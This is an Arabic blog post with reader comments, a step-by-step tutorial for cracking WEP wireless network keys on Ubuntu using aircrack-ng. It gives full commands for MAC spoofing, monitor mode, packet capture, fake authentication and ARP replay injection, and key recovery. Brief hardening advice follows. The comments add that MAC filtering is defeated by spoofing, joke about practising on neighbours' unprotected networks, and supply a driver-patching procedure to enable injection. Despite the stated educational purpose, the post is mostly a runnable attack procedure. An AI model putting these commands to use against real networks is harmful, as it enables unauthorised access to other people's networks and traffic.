قبل البداية ما سيتم شرحه وأنا لست من محترفيها فهي مجرد تجارب وتغيير وإختيار طريقة لإستعمالها في كل تجربة أما من جانب أخر فإني بريء دنيا وأخر من سيقوم بإستعمالها في غير محلها وضعة هذا الشرح لتعليم و لتبيين أن هناك خطئ في إستعمال الشبكة الالسلكيه بدون حماية في شركة أو منزل.
إذا وافقت على الشروط فوق فلنكمل وإذا لم توافق فأنت سوف تحاسب على سرقة
هل أنت موافق على الشروط
هل أنت متأكد من أنك قرأة تلك الشروط ووافقة عليها
الشبكات اللاسلكيه (WLAN) هي أي نوع من الشبكات الحاسوبية التي تعمل على نقل المعلومات بين العقد من دون استخدام الأسلاك (التوصيلات) وهذا يسهل على أي شخص التنقل بدون جر ورائه أي سلك للإتصال بالشبكة وهذا لديه إجابيات و سيئات مثل سرعة الإتصال، ضعف الإشارة،وأخرى…،وأخيرا سهولة بعض المرات إختراق هذه الشبكة
نوع التشفير: خوارزميات السرية WEP
مدة الإختراق: لايعرف لذالك إعمل لك كأس شاي،كأسان شاي واحد لي 
برامج الإختراق: حزمت aircrack-ng
نضام التشغيل: أبونتو ليست مشكلة يمكن إستخدام CD live
إضافة: بطاقة شبكة لاسلكية تعمل على أبونتو
سؤال هل وافقت على الشروط سابقا
أستعمل النضام بإمتيازات root
أولا تنصيب الحزمة aircrack-ng
# apt-get install aircrack-ng
وبعده Macchanger
# apt-get install macchanger
وبمجرد تركيب الحزم نتأكد من عدم الإتصال بأي شبكة لاسلكية إذا كنا نستعملها أحداها بضغط أيقونة الشبكة ألاسلكية ونخطار تعطيل
تفعيل وضعية البطاقة إلى الرصد (بعد البطاقات لاتدعم هذه الخاصية، إذا لم تتمكن من تنشيط هذه الخاصية لن تتمكن من الإكمال)
# airmon-ng start wlan0
سيتم إضافة بطاقة بإسم mon0
الأن نقوم بإقافها
# ifconfig mon0 down
نغير عنوان MAC ل mon0 إلى 00:11:22:33:44:55
# macchanger -m 00:11:22:33:44:55 mon0
نقوم الأن بتفعيل mon0 مرة أخرى
# ifconfig mon0 up
نعمل بحث لشبكة على نقطة الوصول (access point) أو الروتر الخاص بنا
# airodump-ng mon0
يضهر في الصورة يوجد 2 الأول إسمه moha إنه الخاص بي والذي أستعمله ،إنه مفتوح أترك الإجابة للأخير،والروتر الأخر إسمه WLAN هو لتجربة وهو موصول لكن لا أحد موصول له لذالك data هو 0
الذي نحتاجه هو عنوان MAC وهو Bssid و #Data عليه أن يكون أحد يستعمله وهذا يقوم بإكثار العدد وأخيرا CH والملاحظ أنه WEP
لتوقيف عمليت البحث Ctrl+c
والأن نعمل مثل محترفي الإختراق ونفتح 20 نافذة جديدة، توقف ليس ناسا (NASA) من سنقوم بإختراقه لذالك نحتاج 4 نوافذ ولانقوم بإغلاق أي واحدة منهم حتى نقوم بإخراج كلمة السر
أولى النوافذ نقوم بإستعمال airodump-ng مع تغيير مفردات بالخاصة بنا
# airodump-ng -c [CH] -w [Name] --bssid [MAC] mon0
ch رقم القنات
name إسم نقطة الوصول أو الروتر
mac عنوان MAC لنقطة الوصول أو الروتر في هذه الحالة Bssid
مثال الخاص بي
# airodump-ng -c 2 -w WLAN --bssid XX:XX:XX:XX:XX:XX mon0
الأن النافذة التالية وهي الثانية إستعمال aireplay-ng ونبدئ الهجوم على الشبكة ونغير
# aireplay-ng -1 6000 -a [MAC] -h 00:11:22:33:44:55 mon0
MAC الذي أستعمل في النافذة الأولى (BSSID) والتي يجب عدم غلقها
مثال
# aireplay-ng -1 6000 -a XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 mon0
النافذة الثالثة إستعمال aireplay-ng ونغير مثل كل مرة
# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [MAC] -h 00:11:22:33:44:55 mon0
علينا الموافقة ب Y
مثل
# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 mon0
النافذة الرابعة والأخيرة ونستعمل aircrack-ng لفك التشفير على الملفات التي يقوم بإدراجها النوافذ السابقة وهذا يأخذ وقته
# aircrack-ng -z [name]*.cap
مثال
# aircrack-ng -z WLAN*.cap
وبعد مدة يقوم بإدراج حل كلمة الشبكة السلكية xx:xx:xx:xx:xx والملحوض التي حصلة عليها هي 64:F2:4C:A4:19 وتجربتها هل هي تعمل علينا إزالة النقطتان الثنائيتين (64F24CA419)
كيفية تأمين الشبكة سهل لأنه لا يوجد غير إستعمال محيط الواي بي اي WPA وهذا يتم إختراقه عبر تجربة إكلمة وراء كلمة من قاموس بالقوة حتى يتم إجاد تلك الكلمة وإذا لم توجد يتعيين عليه البحث عن قاموس أخر ، وفي الشريكات يجب إستخدام إضافة إلى WPA تصفية ل MAC الذي يوجد في الجدار الخاص بالرتر أو نقطة الإتصال
نسيت عليك تغيير كلمة السر من حين لأخر
أما الخاصة بي فإني حنون على الجران يمكنهم إستعمالها لكنه غير قادرين لأنه يتم إكمال تجربتي عبر التصفية عبر MAC
تحياتي
إختراق الشبكات اللاسلكية WEP بأبونتو
-
- كتبت في
- بواسطة: محمد
- 10 تعليقات
يقولون: الوقاية خير من العلاج ^_^
تشفير WEP عفى عليه الزمن، أنا أستخدم WPA2..
كذلك، أترك ال SSID مخفيا وبالتالي لا يتعرف أحد على شبكتي. أقوم بحصر الإتصال اللاسلكي بمجموعة عناوين MAC الخاصة بحواسيب البيت، أي عنوان يخالفها لا يمكنك استغلال إتصالي
عموما، لحد الآن لم أنتبه لاستخدام صبيبي من طرف أحد آخر..
بالمناسبة، هناك الكثير من الشبكات غير المحمية في الحي، دجاجة بكامونها لمن أراد التدرب
بهذا الحسب حتى الجن الأزرق لايمكنه معرفة إختراق شبكتك اللاسلكية
أما بالنسبة يمكنك فتح مقهى حاسوب (مطعم دجاج) على حساب الحي فذالك لن يكلفك شيءا
فهمت الآن أنت تريد بهذا المقال توعية الناس لمخاطر عدم حماية الشبكات اللاسلكية.. على كل المقال ممتاز ويبدو أنكم أوجدتم له استخدامات عديدة..
نعم أخي إنه لذالك WEP كمن ليس له حماية
التصفية عبر MAC تنتهي مع كلمة السر ل WEP لأنه يمكن توهيم تغيير MAC بإستعمال macchanger لأنه بعد المرات يمكنك معرفة MAC المتصلة عبر STATION في الصورة الثانية
وشكرا على مرورك الغالي
مرحبا محمد انه موضوع رائع لكن عندي مشكل ممكن تساعدني انظر صورةfile:///home/saber/Bureau/Capture.png
أهلا بك، فرحت عندما وجدت تعليقا لكن عند قرائته وجدت أنه ينقصه شيء ^^
اوكي المعدرة يا اخي محمد هاهي صورة http://img249.imageshack.us/img249/8712/captureqa.png او http://img249.imageshack.us/i/captureqa.png/
أضن أنها بطاقة من نوع Intel والنضام أبونتو 10.10 إذن الحل
wget http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2010-10-16.tar.bz2tar -jxf compat-wireless-2010-10-16.tar.bz2
cd compat-wireless-2010-10-16
wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch
patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch
wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch
patch ./net/wireless/chan.c channel-negative-one-maxim.patch
gedit scripts/update-initramfs
#*** إبحث عن السطر 13: KLIB=/lib/modules/2.6.31-wl/build
#*** قم بتغييره ليصبح مثل هذا: KLIB=/lib/modules/$(uname -r)/build
make
sudo make install
sudo make unload
sudo reboot
مرحبا اخي محمد انا عندي بطاقة من نوع RTL8187/RTL8187B USB wireless
الخطوات السابقة جربتها على بطاقة intel التي عندي وتعمل لكن لم أجد أي usb wirless لتجربة لذالك أنت تخطار هل تجرب أم لا =)
وإذا وجدت طريقة أخرى أتركها لك .